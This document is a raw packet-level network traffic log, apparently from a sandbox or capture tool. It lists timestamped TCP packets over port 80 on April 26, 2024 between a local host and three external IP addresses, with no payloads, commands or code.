Apr 26, 2024 23:08:56.329921961 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.329942942 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.329993963 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330048084 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.330053091 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330101967 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330157995 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.330182076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330271959 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330322981 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.330332041 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330403090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330456018 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.330466032 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330483913 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330534935 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.330538034 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330620050 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330672979 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.330801964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330820084 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330840111 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330868006 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.330935001 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.330991983 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.331085920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331155062 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331208944 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.331372023 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331443071 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331495047 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.331507921 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331593990 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331645966 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.331675053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331780910 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331828117 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.331845999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331899881 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.331949949 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.331995010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332123995 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332140923 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332174063 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.332216978 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332276106 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.332303047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332405090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332454920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332456112 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.332525969 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332576036 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.332603931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332703114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332752943 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.332778931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332851887 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.332902908 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.332973957 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.333019018 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.333067894 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.333096027 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.333336115 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.333383083 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.333426952 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.333506107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.333556890 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.567306042 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567337036 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567370892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567413092 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.567425013 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567445040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567464113 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567476034 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.567508936 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.567516088 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567552090 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567598104 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.567627907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567663908 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567682028 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567713976 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.567724943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567742109 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567771912 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.567775965 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567821026 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.567847013 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567873955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.567928076 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568121910 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568175077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568192959 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568211079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568228960 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568296909 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568300962 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568322897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568340063 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568341970 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568361998 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568377972 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568412066 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568469048 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568485975 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568494081 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568502903 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568523884 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568526983 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568547010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568561077 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568597078 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568614006 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568619967 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568649054 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568667889 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568690062 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568717957 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568733931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568784952 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568803072 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568837881 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568857908 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568875074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568903923 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568907976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568927050 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.568955898 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.568990946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569040060 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569168091 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569221020 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569252968 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569267988 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569269896 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569289923 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569318056 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569323063 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569356918 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569374084 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569375992 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569406986 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569422007 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569426060 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569470882 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569492102 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569514990 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569534063 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569551945 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569566011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569586992 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569602013 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569622993 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569641113 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569668055 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569675922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569709063 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569721937 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569725990 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569772005 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569797993 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569865942 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569890976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569916964 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.569943905 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.569989920 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570002079 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570020914 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570038080 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570055008 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570065022 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570101023 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570138931 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570156097 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570172071 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570188999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570199013 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570235968 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570240021 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570312977 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570332050 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570350885 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570359945 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570386887 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570394993 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570755005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570811033 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570832968 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570920944 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.570966959 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.570995092 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571110964 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571156025 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.571183920 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571225882 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571270943 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.571304083 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571372032 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571415901 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.571432114 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571533918 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571549892 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 26, 2024 23:08:56.571583986 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:56.571634054 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 26, 2024 23:08:57.331226110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:08:57.571935892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:08:57.572026014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:08:57.572292089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:08:57.813093901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:08:58.134627104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:08:58.137207031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:08:59.586766958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:08:59.654524088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:08:59.852344990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:08:59.852436066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:08:59.852603912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:08:59.894968033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.002825975 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.002840996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.002883911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.002897978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.005433083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.118618011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118778944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118791103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118803024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118814945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118828058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118840933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118853092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118849993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.118868113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118881941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118895054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.118906975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.118906975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.118952990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.118952990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.245805025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.358799934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.358814001 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.358860016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.358875990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.358884096 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.358894110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.358906984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.358916044 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.358939886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.384146929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384205103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384217024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384234905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384248972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384272099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384285927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384325027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384337902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384350061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384358883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384358883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384380102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384419918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384421110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384433031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384457111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384469986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384479046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384494066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384497881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384514093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384529114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384577036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384577990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384589911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384624958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384624958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.384676933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.384712934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.402364969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.402429104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.642769098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.643121004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.643132925 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.643295050 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.643575907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.643635035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.650183916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.650259018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.650321960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.650680065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.650803089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.650862932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.650886059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.650898933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.650942087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.650974035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651062012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651110888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.651143074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651217937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651261091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.651283026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651355028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651393890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.651420116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651477098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651542902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651568890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.651601076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651638031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.651652098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651736975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651768923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651776075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.651825905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651865959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.651887894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651925087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.651961088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.651981115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652034044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652074099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.652091026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652142048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652154922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652182102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.652245045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652285099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652287006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.652298927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652342081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.652407885 CEST	80	49734	176.97.76.106	192.168.2.4
